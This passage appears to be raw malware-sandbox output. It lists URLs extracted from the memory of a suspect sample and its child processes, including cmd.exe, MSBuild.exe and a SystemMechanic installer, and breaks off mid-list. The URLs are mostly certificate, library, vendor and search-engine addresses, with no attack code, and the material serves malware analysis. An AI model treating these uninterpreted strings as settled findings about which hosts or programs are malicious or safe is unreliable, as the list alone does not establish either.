Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: MSBuild.exe, 0000000E.00000002.2977711882.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.0000000002590000.00000004.00001000.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.000000000258B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u5c4.3.exe, 00000005.00000003.2272268164.00000000025B6000.00000004.00001000.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.0000000002654000.00000004.00001000.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.0000000002619000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071517610.00000240FE690000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.0000000002612000.00000004.00001000.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000002.00000002.1888066079.00000000044B0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.0000000005632000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.0000000003758000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.0000000005766000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u5c4.0.exe, u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u5c4.0.exe, 00000001.00000002.2519749464.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u5c4.3.exe, 00000005.00000003.2272268164.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
Source: MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 